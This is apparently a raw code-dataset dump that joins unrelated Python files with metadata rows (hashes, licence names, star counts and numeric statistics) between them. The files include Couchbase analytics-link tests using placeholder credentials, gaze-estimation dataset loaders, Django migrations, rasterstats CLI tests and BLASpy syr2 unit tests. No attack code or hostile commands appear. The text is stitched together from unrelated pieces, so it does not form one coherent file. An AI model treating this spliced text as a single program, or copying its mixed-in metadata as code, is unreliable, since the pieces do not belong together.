link = AzureBlobExternalAnalyticsLink(dataverse_name,
"azurebloblink",
account_name="myaccount")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = AzureBlobExternalAnalyticsLink(dataverse_name,
"azurebloblink",
account_key="myaccountkey")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
link = AzureBlobExternalAnalyticsLink(dataverse_name,
"azurebloblink",
shared_access_signature="sharedaccesssignature")
with self.assertRaises(InvalidArgumentException):
self.mgr.create_link(link)
self.mgr.drop_dataverse(
dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_link_fail_link_not_found(self):
dataverse_name = "test_dataverse"
self.mgr.create_dataverse(
dataverse_name, CreateDataverseOptions(ignore_if_exists=True))
link = S3ExternalAnalyticsLink(dataverse_name,
"notalink",
"accesskey",
"us-west-2",
secret_access_key="mysupersecretkey",
)
with self.assertRaises(AnalyticsLinkNotFoundException):
self.mgr.replace_link(link)
with self.assertRaises(AnalyticsLinkNotFoundException):
self.mgr.drop_link(link.name(), link.dataverse_name())
link = CouchbaseRemoteAnalyticsLink(dataverse_name,
"cbremote",
"localhost",
CouchbaseAnalyticsEncryptionSettings(
AnalyticsEncryptionLevel.NONE),
username="Administrator",
password="password")
with self.assertRaises(AnalyticsLinkNotFoundException):
self.mgr.replace_link(link)
with self.assertRaises(AnalyticsLinkNotFoundException):
self.mgr.drop_link(link.name(), link.dataverse_name())
link = AzureBlobExternalAnalyticsLink(dataverse_name,
"azurebloblink",
account_name="myaccount",
account_key="myaccountkey")
with self.assertRaises(AnalyticsLinkNotFoundException):
self.mgr.replace_link(link)
with self.assertRaises(AnalyticsLinkNotFoundException):
self.mgr.drop_link(link.name(), link.dataverse_name())
self.mgr.drop_dataverse(
dataverse_name, DropDataverseOptions(ignore_if_not_exists=True))
def test_get_links_fail(self):
with self.assertRaises(DataverseNotFoundException):
self.mgr.get_links(GetLinksAnalyticsOptions(
dataverse_name="notadataverse"))
with self.assertRaises(InvalidArgumentException):
self.mgr.get_links(GetLinksAnalyticsOptions(name="mylink"))
| 46.449292
| 125
| 0.529031
| 3,120
| 39,389
| 6.455769
| 0.101923
| 0.091649
| 0.033562
| 0.026164
| 0.816801
| 0.800963
| 0.78587
| 0.769586
| 0.744266
| 0.731606
| 0
| 0.007783
| 0.393282
| 39,389
| 847
| 126
| 46.504132
| 0.835049
| 0.031557
| 0
| 0.74584
| 0
| 0
| 0.075304
| 0.002283
| 0
| 0
| 0
| 0
| 0.122542
| 1
| 0.043873
| false
| 0.018154
| 0.01059
| 0
| 0.06354
| 0.016641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d4e022331f78c0457a6bc113e4039ef90bf7aa5
| 4,994
|
py
|
Python
|
datasets.py
|
Ahmednull/L2S-Net
|
bf6a1c443de65a7c9b25becfd6ddea4445714c6c
|
[
"MIT"
] | 21
|
2022-03-07T20:29:50.000Z
|
2022-03-25T09:25:32.000Z
|
datasets.py
|
Ahmednull/L2S-Net
|
bf6a1c443de65a7c9b25becfd6ddea4445714c6c
|
[
"MIT"
] | 3
|
2022-03-21T14:13:25.000Z
|
2022-03-31T01:34:46.000Z
|
datasets.py
|
Ahmednull/L2S-Net
|
bf6a1c443de65a7c9b25becfd6ddea4445714c6c
|
[
"MIT"
] | 4
|
2022-02-24T13:13:52.000Z
|
2022-03-22T06:23:14.000Z
|
import os
import numpy as np
import cv2
import torch
from torch.utils.data.dataset import Dataset
from torchvision import transforms
from PIL import Image, ImageFilter
class Gaze360(Dataset):
def __init__(self, path, root, transform, angle, binwidth, train=True):
self.transform = transform
self.root = root
self.orig_list_len = 0
self.angle = angle
if train==False:
angle=90
self.binwidth=binwidth
self.lines = []
if isinstance(path, list):
for i in path:
with open(i) as f:
print("here")
line = f.readlines()
line.pop(0)
self.lines.extend(line)
else:
with open(path) as f:
lines = f.readlines()
lines.pop(0)
self.orig_list_len = len(lines)
for line in lines:
gaze2d = line.strip().split(" ")[5]
label = np.array(gaze2d.split(",")).astype("float")
if abs((label[0]*180/np.pi)) <= angle and abs((label[1]*180/np.pi)) <= angle:
self.lines.append(line)
print("{} items removed from dataset that have an angle > {}".format(self.orig_list_len-len(self.lines), angle))
def __len__(self):
return len(self.lines)
def __getitem__(self, idx):
line = self.lines[idx]
line = line.strip().split(" ")
face = line[0]
lefteye = line[1]
righteye = line[2]
name = line[3]
gaze2d = line[5]
label = np.array(gaze2d.split(",")).astype("float")
label = torch.from_numpy(label).type(torch.FloatTensor)
pitch = label[0]* 180 / np.pi
yaw = label[1]* 180 / np.pi
img = Image.open(os.path.join(self.root, face))
# fimg = cv2.imread(os.path.join(self.root, face))
# fimg = cv2.resize(fimg, (448, 448))/255.0
# fimg = fimg.transpose(2, 0, 1)
# img=torch.from_numpy(fimg).type(torch.FloatTensor)
if self.transform:
img = self.transform(img)
# Bin values
bins = np.array(range(-1*self.angle, self.angle, self.binwidth))
binned_pose = np.digitize([pitch, yaw], bins) - 1
labels = binned_pose
cont_labels = torch.FloatTensor([pitch, yaw])
return img, labels, cont_labels, name
class Mpiigaze(Dataset):
def __init__(self, pathorg, root, transform, train, angle,fold=0):
self.transform = transform
self.root = root
self.orig_list_len = 0
self.lines = []
path=pathorg.copy()
if train==True:
path.pop(fold)
else:
path=path[fold]
if isinstance(path, list):
for i in path:
with open(i) as f:
lines = f.readlines()
lines.pop(0)
self.orig_list_len += len(lines)
for line in lines:
gaze2d = line.strip().split(" ")[7]
label = np.array(gaze2d.split(",")).astype("float")
if abs((label[0]*180/np.pi)) <= angle and abs((label[1]*180/np.pi)) <= angle:
self.lines.append(line)
else:
with open(path) as f:
lines = f.readlines()
lines.pop(0)
self.orig_list_len += len(lines)
for line in lines:
gaze2d = line.strip().split(" ")[7]
label = np.array(gaze2d.split(",")).astype("float")
if abs((label[0]*180/np.pi)) <= 42 and abs((label[1]*180/np.pi)) <= 42:
self.lines.append(line)
print("{} items removed from dataset that have an angle > {}".format(self.orig_list_len-len(self.lines),angle))
def __len__(self):
return len(self.lines)
def __getitem__(self, idx):
line = self.lines[idx]
line = line.strip().split(" ")
name = line[3]
gaze2d = line[7]
head2d = line[8]
lefteye = line[1]
righteye = line[2]
face = line[0]
label = np.array(gaze2d.split(",")).astype("float")
label = torch.from_numpy(label).type(torch.FloatTensor)
pitch = label[0]* 180 / np.pi
yaw = label[1]* 180 / np.pi
img = Image.open(os.path.join(self.root, face))
# fimg = cv2.imread(os.path.join(self.root, face))
# fimg = cv2.resize(fimg, (448, 448))/255.0
# fimg = fimg.transpose(2, 0, 1)
# img=torch.from_numpy(fimg).type(torch.FloatTensor)
if self.transform:
img = self.transform(img)
# Bin values
bins = np.array(range(-42, 42,3))
binned_pose = np.digitize([pitch, yaw], bins) - 1
labels = binned_pose
cont_labels = torch.FloatTensor([pitch, yaw])
return img, labels, cont_labels, name
| 31.607595
| 121
| 0.524029
| 619
| 4,994
| 4.147011
| 0.174475
| 0.042072
| 0.027269
| 0.040904
| 0.802104
| 0.7873
| 0.767822
| 0.760421
| 0.759642
| 0.759642
| 0
| 0.036563
| 0.342811
| 4,994
| 157
| 122
| 31.808917
| 0.745582
| 0.073488
| 0
| 0.725664
| 0
| 0
| 0.032533
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053097
| false
| 0
| 0.061947
| 0.017699
| 0.168142
| 0.026549
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b4d6aa934c49af912d6fb270aed6bb097aa45408
| 100
|
py
|
Python
|
pygr/apps/__init__.py
|
Open-Technology/Graph-Database
|
0b5bd2414b888c4709af3390f9d41dc8e0d4a863
|
[
"BSD-3-Clause"
] | 30
|
2015-02-24T12:47:10.000Z
|
2022-02-02T10:41:54.000Z
|
pygr/apps/__init__.py
|
Open-Technology/Graph-Database
|
0b5bd2414b888c4709af3390f9d41dc8e0d4a863
|
[
"BSD-3-Clause"
] | 4
|
2015-08-08T07:30:35.000Z
|
2021-11-18T18:50:01.000Z
|
pygr/apps/__init__.py
|
Open-Technology/Graph-Database
|
0b5bd2414b888c4709af3390f9d41dc8e0d4a863
|
[
"BSD-3-Clause"
] | 14
|
2015-02-12T02:55:45.000Z
|
2021-11-24T19:43:40.000Z
|
from pygr.apps.leelabdb import *
from pygr.apps.seqref import *
from pygr.apps.splicegraph import *
| 25
| 35
| 0.79
| 15
| 100
| 5.266667
| 0.466667
| 0.303797
| 0.455696
| 0.455696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 100
| 3
| 36
| 33.333333
| 0.897727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
2597c27f4455e012b6d6cc94b8d72bdf6cf9605c
| 1,129
|
py
|
Python
|
coopihc/observation/utils.py
|
jgori-ouistiti/CoopIHC
|
0fe24c618a430517c1394625275faff3ce344f7f
|
[
"MIT"
] | null | null | null |
coopihc/observation/utils.py
|
jgori-ouistiti/CoopIHC
|
0fe24c618a430517c1394625275faff3ce344f7f
|
[
"MIT"
] | 52
|
2021-11-23T13:49:50.000Z
|
2022-03-15T12:28:18.000Z
|
coopihc/observation/utils.py
|
jgori-ouistiti/CoopIHC
|
0fe24c618a430517c1394625275faff3ce344f7f
|
[
"MIT"
] | 1
|
2022-03-08T11:10:24.000Z
|
2022-03-08T11:10:24.000Z
|
import numpy
# ========================== Some observation engine specifications
oracle_engine_specification = [
("game_info", "all"),
("task_state", "all"),
("user_state", "all"),
("assistant_state", "all"),
("user_action", "all"),
("assistant_action", "all"),
]
blind_engine_specification = [
("game_info", "all"),
("task_state", None),
("user_state", None),
("assistant_state", None),
("user_action", "all"),
("assistant_action", "all"),
]
base_task_engine_specification = [
("game_info", "all"),
("task_state", "all"),
("user_state", None),
("assistant_state", None),
("user_action", "all"),
("assistant_action", "all"),
]
base_user_engine_specification = [
("game_info", "all"),
("task_state", "all"),
("user_state", "all"),
("assistant_state", None),
("user_action", "all"),
("assistant_action", "all"),
]
base_assistant_engine_specification = [
("game_info", "all"),
("task_state", "all"),
("user_state", None),
("assistant_state", "all"),
("user_action", "all"),
("assistant_action", "all"),
]
| 22.58
| 67
| 0.572188
| 114
| 1,129
| 5.289474
| 0.166667
| 0.149254
| 0.119403
| 0.223881
| 0.870647
| 0.870647
| 0.870647
| 0.80597
| 0.80597
| 0.693201
| 0
| 0
| 0.190434
| 1,129
| 49
| 68
| 23.040816
| 0.659737
| 0.057573
| 0
| 0.707317
| 0
| 0
| 0.399247
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02439
| 0
| 0.02439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
25e69bac250de1a93790f1d8ecc57ccbc0ccdfd0
| 1,666
|
py
|
Python
|
hs_access_control/migrations/0011_auto_rename_new_fields_to_original_names.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 1
|
2018-09-17T13:07:29.000Z
|
2018-09-17T13:07:29.000Z
|
hs_access_control/migrations/0011_auto_rename_new_fields_to_original_names.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 100
|
2017-08-01T23:48:04.000Z
|
2018-04-03T13:17:27.000Z
|
hs_access_control/migrations/0011_auto_rename_new_fields_to_original_names.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 2
|
2017-07-27T20:41:33.000Z
|
2017-07-27T22:40:57.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('hs_access_control', '0010_auto_rename_related_names'),
]
operations = [
migrations.RenameField(
model_name='groupresourceprivilege',
old_name='grantornew',
new_name='grantor',
),
migrations.RenameField(
model_name='groupresourceprivilege',
old_name='groupnew',
new_name='group',
),
migrations.RenameField(
model_name='groupresourceprivilege',
old_name='resourcenew',
new_name='resource',
),
migrations.RenameField(
model_name='usergroupprivilege',
old_name='grantornew',
new_name='grantor',
),
migrations.RenameField(
model_name='usergroupprivilege',
old_name='groupnew',
new_name='group',
),
migrations.RenameField(
model_name='usergroupprivilege',
old_name='usernew',
new_name='user',
),
migrations.RenameField(
model_name='userresourceprivilege',
old_name='grantornew',
new_name='grantor',
),
migrations.RenameField(
model_name='userresourceprivilege',
old_name='resourcenew',
new_name='resource',
),
migrations.RenameField(
model_name='userresourceprivilege',
old_name='usernew',
new_name='user',
),
]
| 27.766667
| 64
| 0.555222
| 127
| 1,666
| 6.984252
| 0.314961
| 0.213078
| 0.263811
| 0.304397
| 0.807215
| 0.807215
| 0.766629
| 0.476888
| 0.476888
| 0.476888
| 0
| 0.004554
| 0.340936
| 1,666
| 59
| 65
| 28.237288
| 0.803279
| 0.012605
| 0
| 0.849057
| 0
| 0
| 0.223372
| 0.096774
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037736
| 0
| 0.09434
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d30db6a05629b4f15882a45fcc293e23dfc82f0e
| 125
|
py
|
Python
|
chatrooms/admin.py
|
dsingh12345/chatapp
|
94e0d0f3f2fb58699033f578b9beaa733a10632d
|
[
"MIT"
] | null | null | null |
chatrooms/admin.py
|
dsingh12345/chatapp
|
94e0d0f3f2fb58699033f578b9beaa733a10632d
|
[
"MIT"
] | null | null | null |
chatrooms/admin.py
|
dsingh12345/chatapp
|
94e0d0f3f2fb58699033f578b9beaa733a10632d
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Chat, ChatRoom
admin.site.register(ChatRoom)
admin.site.register(Chat)
| 20.833333
| 34
| 0.816
| 18
| 125
| 5.666667
| 0.555556
| 0.254902
| 0.333333
| 0.490196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096
| 125
| 5
| 35
| 25
| 0.902655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d315c90deb52198b4a6b69972d25184a55115316
| 2,133
|
py
|
Python
|
joblicant/JoblicantApp/migrations/0003_auto_20210705_1206.py
|
juliuscecilia33/joblicant
|
b654bc438838f633556cef16fa7e5bfa63eecfb6
|
[
"MIT"
] | null | null | null |
joblicant/JoblicantApp/migrations/0003_auto_20210705_1206.py
|
juliuscecilia33/joblicant
|
b654bc438838f633556cef16fa7e5bfa63eecfb6
|
[
"MIT"
] | null | null | null |
joblicant/JoblicantApp/migrations/0003_auto_20210705_1206.py
|
juliuscecilia33/joblicant
|
b654bc438838f633556cef16fa7e5bfa63eecfb6
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.4 on 2021-07-05 19:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('JoblicantApp', '0002_auto_20210705_1204'),
]
operations = [
migrations.AlterField(
model_name='commoninformation',
name='CurrentCompany',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='Email',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='FullName',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='Github',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='LinkedIn',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='OtherWebsite',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='Phone',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='Portfolio',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='ResumeFileName',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='commoninformation',
name='Twitter',
field=models.CharField(blank=True, max_length=100, null=True),
),
]
| 33.328125
| 74
| 0.584154
| 196
| 2,133
| 6.244898
| 0.25
| 0.163399
| 0.204248
| 0.236928
| 0.775327
| 0.775327
| 0.734477
| 0.734477
| 0.687092
| 0.687092
| 0
| 0.038926
| 0.301453
| 2,133
| 63
| 75
| 33.857143
| 0.78255
| 0.021097
| 0
| 0.684211
| 1
| 0
| 0.14046
| 0.011026
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d323eba25cc7419247463057abc2693a4bed0de6
| 5,523
|
py
|
Python
|
tests/test_cli.py
|
brendancol/python-raster-stats
|
6bdb524aa1471a719ba3ee6491786d2ac5c8a7ab
|
[
"BSD-3-Clause"
] | 1
|
2017-08-12T22:01:03.000Z
|
2017-08-12T22:01:03.000Z
|
tests/test_cli.py
|
brendancol/python-raster-stats
|
6bdb524aa1471a719ba3ee6491786d2ac5c8a7ab
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_cli.py
|
brendancol/python-raster-stats
|
6bdb524aa1471a719ba3ee6491786d2ac5c8a7ab
|
[
"BSD-3-Clause"
] | null | null | null |
import os.path
import json
import warnings
# Some warnings must be ignored to parse output properly
# https://github.com/pallets/click/issues/371#issuecomment-223790894
from click.testing import CliRunner
from rasterstats.cli import zonalstats, pointquery
def test_cli_feature():
raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
vector = os.path.join(os.path.dirname(__file__), 'data/feature.geojson')
runner = CliRunner()
warnings.simplefilter('ignore')
result = runner.invoke(zonalstats, [vector,
'--raster', raster,
'--stats', 'mean',
'--prefix', 'test_'])
assert result.exit_code == 0
outdata = json.loads(result.output)
assert len(outdata['features']) == 1
feature = outdata['features'][0]
assert 'test_mean' in feature['properties']
assert round(feature['properties']['test_mean'], 2) == 14.66
assert 'test_count' not in feature['properties']
def test_cli_feature_stdin():
raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
vector = os.path.join(os.path.dirname(__file__), 'data/feature.geojson')
runner = CliRunner()
warnings.simplefilter('ignore')
result = runner.invoke(zonalstats,
['--raster', raster,
'--stats', 'mean',
'--prefix', 'test_'],
input=open(vector, 'r').read())
assert result.exit_code == 0
outdata = json.loads(result.output)
assert len(outdata['features']) == 1
feature = outdata['features'][0]
assert 'test_mean' in feature['properties']
def test_cli_features_sequence():
raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
runner = CliRunner()
result = runner.invoke(zonalstats, [vector,
'--raster', raster,
'--stats', 'mean',
'--prefix', 'test_',
'--sequence'])
assert result.exit_code == 0
results = result.output.splitlines()
for r in results:
outdata = json.loads(r)
assert outdata['type'] == 'Feature'
def test_cli_features_sequence_rs():
raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
runner = CliRunner()
result = runner.invoke(zonalstats, [vector,
'--raster', raster,
'--stats', 'mean',
'--prefix', 'test_',
'--sequence', '--rs'])
assert result.exit_code == 0
# assert result.output.startswith(b'\x1e')
assert result.output[0] == '\x1e'
def test_cli_featurecollection():
raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
runner = CliRunner()
result = runner.invoke(zonalstats, [vector,
'--raster', raster,
'--stats', 'mean',
'--prefix', 'test_'])
assert result.exit_code == 0
outdata = json.loads(result.output)
assert len(outdata['features']) == 2
feature = outdata['features'][0]
assert 'test_mean' in feature['properties']
assert round(feature['properties']['test_mean'], 2) == 14.66
assert 'test_count' not in feature['properties']
def test_cli_pointquery():
raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
runner = CliRunner()
result = runner.invoke(pointquery, [vector,
'--raster', raster,
'--property-name', 'slope'])
assert result.exit_code == 0
outdata = json.loads(result.output)
assert len(outdata['features']) == 2
feature = outdata['features'][0]
assert 'slope' in feature['properties']
def test_cli_point_sequence():
raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
runner = CliRunner()
result = runner.invoke(pointquery, [vector,
'--raster', raster,
'--property-name', 'slope',
'--sequence'])
assert result.exit_code == 0
results = result.output.splitlines()
for r in results:
outdata = json.loads(r)
assert outdata['type'] == 'Feature'
def test_cli_point_sequence_rs():
raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
runner = CliRunner()
result = runner.invoke(pointquery, [vector,
'--raster', raster,
'--property-name', 'slope',
'--sequence', '--rs'])
assert result.exit_code == 0
assert result.output[0] == '\x1e'
| 41.840909
| 86
| 0.556038
| 567
| 5,523
| 5.227513
| 0.148148
| 0.066802
| 0.053981
| 0.064777
| 0.892713
| 0.875169
| 0.851552
| 0.851552
| 0.851552
| 0.851552
| 0
| 0.011178
| 0.303458
| 5,523
| 131
| 87
| 42.160305
| 0.759293
| 0.029151
| 0
| 0.828829
| 0
| 0
| 0.164458
| 0.033601
| 0
| 0
| 0
| 0
| 0.216216
| 1
| 0.072072
| false
| 0
| 0.045045
| 0
| 0.117117
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d342a9a652780d1332127bfb50063565e5a000be
| 70
|
py
|
Python
|
flask_logger_decorator/utils.py
|
sunwei/flask-logger-decorator
|
080d412db3dbdc2a4d34fe1d31605fbcb0d31992
|
[
"MIT"
] | 1
|
2020-04-16T03:51:56.000Z
|
2020-04-16T03:51:56.000Z
|
flask_logger_decorator/utils.py
|
sunwei/flask-logger-decorator
|
080d412db3dbdc2a4d34fe1d31605fbcb0d31992
|
[
"MIT"
] | null | null | null |
flask_logger_decorator/utils.py
|
sunwei/flask-logger-decorator
|
080d412db3dbdc2a4d34fe1d31605fbcb0d31992
|
[
"MIT"
] | null | null | null |
import uuid
def generate_request_id():
return str(uuid.uuid4())
| 11.666667
| 28
| 0.714286
| 10
| 70
| 4.8
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0.171429
| 70
| 5
| 29
| 14
| 0.810345
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
d35ed3700088ef2326c911c67af2cb0243299bb3
| 15,228
|
py
|
Python
|
bp_unit_tests/level_2/unit_test_syr2.py
|
nicholas-moreles/blaspy
|
c4af6258e17dd996c4b6d90bbaae15b31b8702b4
|
[
"BSD-3-Clause"
] | 4
|
2015-01-25T12:44:44.000Z
|
2022-03-19T08:36:19.000Z
|
bp_unit_tests/level_2/unit_test_syr2.py
|
nicholas-moreles/blaspy
|
c4af6258e17dd996c4b6d90bbaae15b31b8702b4
|
[
"BSD-3-Clause"
] | 7
|
2015-01-20T13:35:39.000Z
|
2015-05-31T17:11:50.000Z
|
bp_unit_tests/level_2/unit_test_syr2.py
|
nicholas-moreles/blaspy
|
c4af6258e17dd996c4b6d90bbaae15b31b8702b4
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Copyright (c) 2014-2015, The University of Texas at Austin.
All rights reserved.
This file is part of BLASpy and is available under the 3-Clause
BSD License, which can be found in the LICENSE file at the top-level
directory or at http://opensource.org/licenses/BSD-3-Clause
"""
from blaspy import syr2
from numpy import array, asmatrix
from string import ascii_letters
from unittest import TestCase
class TestSyr2(TestCase):
def test_scalars_as_ndarray_provide_A(self):
A = array([[1.]])
x = array([[2.]])
y = array([[3.]])
self.assertEqual(syr2(x, y, A), 13)
self.assertEqual(A, 13)
def test_scalars_as_ndarray_no_A(self):
x = array([[2.]])
y = array([[3.]])
self.assertEqual(syr2(x, y), 12)
def test_row_row_as_ndarray_provide_A(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1., 2.]])
y = array([[3., 4.]])
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_row_row_as_ndarray_no_A(self):
x = array([[1., 2.]])
y = array([[3., 4.]])
expected = [[6., 10.],
[0., 16.]]
self.assertListEqual(syr2(x, y).tolist(), expected)
def test_matrix_row_col_as_ndarray_provide_A(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1., 2.]])
y = array([[3.],
[4.]])
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_matrix_col_row_as_ndarray_provide_A(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3., 4.]])
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_matrix_col_col_as_ndarray_provide_y(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_matrix_col_col_as_ndarray_no_A(self):
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[6., 10.],
[0., 16.]]
self.assertListEqual(syr2(x, y).tolist(), expected)
def test_lower_triangle_ignored_with_uplo_u(self):
A = array([[1., 2.],
[-100., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 12.],
[-100., 19.]]
self.assertListEqual(syr2(x, y, A, uplo='u').tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_lower_triangle_ignored_with_uplo_U(self):
A = array([[1., 2.],
[-100., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 12.],
[-100., 19.]]
self.assertListEqual(syr2(x, y, A, uplo='U').tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_upper_triangle_ignored_with_uplo_l(self):
A = array([[1., 55.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 55.],
[12., 19.]]
self.assertListEqual(syr2(x, y, A, uplo='l').tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_upper_triangle_ignored_with_uplo_L(self):
A = array([[1., 55.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 55.],
[12., 19.]]
self.assertListEqual(syr2(x, y, A, uplo='L').tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_alpha(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
alpha = 2.5
expected = [[16., 27.],
[2., 43.]]
self.assertListEqual(syr2(x, y, A, alpha=alpha).tolist(), expected)
